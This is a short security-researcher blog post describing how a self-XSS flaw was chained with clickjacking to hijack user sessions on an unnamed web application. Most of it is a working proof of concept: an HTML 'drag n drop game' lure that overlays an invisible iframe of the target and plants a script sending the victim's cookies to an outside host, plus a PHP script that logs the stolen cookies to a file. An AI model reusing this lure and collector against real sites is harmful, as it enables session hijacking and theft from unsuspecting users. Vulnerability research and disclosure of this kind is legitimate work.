Chaining Self XSS with UI Redressing is Leading to Session Hijacking (PWN users like a boss)

while i was testing the web application i have found self xss. which has no impact. but i wanted to exploit this vulnerability, so have started thinking that how can i exploit this self xss, and then i have decided to chain the self xss with some other vulnerability.

so again a have stared looking for CSRF attack, but i dint get CSRF on the vulnerable page.

But i had noticed that application was not using the x-frame header. so thought lets check for click jacking. ! 
and yeah ! application was vulnerable with click jacking.

so have decided to chain Self xss with click jacking.

Here is the Click jacking which is chained with self xss which grabs victim’s cookies.

<html>
<head><title>Poc</title></head>
<body bgcolor=”gray”>
<h1 align=”center”>DRAG N DROP GAME</h1>
<br><br><br>
<img src=”https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSi0I3s6J4VZohcVZbzUzJ-g-y722W8jqyo4g1lc0HhM9SH9WN9" draggable=true id=drag ondragstart=”event.dataTransfer.setData(‘text/plain’,’<script>location=`http://armaanpathan.pe.hu/cookies.php?cookie=`+btoa(document.cookie)</script>')">

<br><br><br>
<style type=”text/css”>
iframe {
width: 800px;
height: 650px;
position: absolute;
top: 2; right: 10;
filter: alpha(opacity=50);
opacity: 0.00 ;

</style>
<style type=”text/css”>
 h2{
position: absolute;
top: 420; right: 30;
}
</style>
<iframe src=”www.victim.com"></iframe>
<H2>DRAG THE IMAGE HERE</h2>
</html>

here is the code which saves the grabbed cookies in txt file

<?php

$c=$_GET[‘cookie’];
file_put_contents(“cookies.txt”,$c . “\n\n”,FILE_APPEND);

?>

and yeah i was able to hijack any user’s sessions.

Here is the PoC video

Spacial thanks to Rahul Maini . for helping me. :)

thanks for reading. :)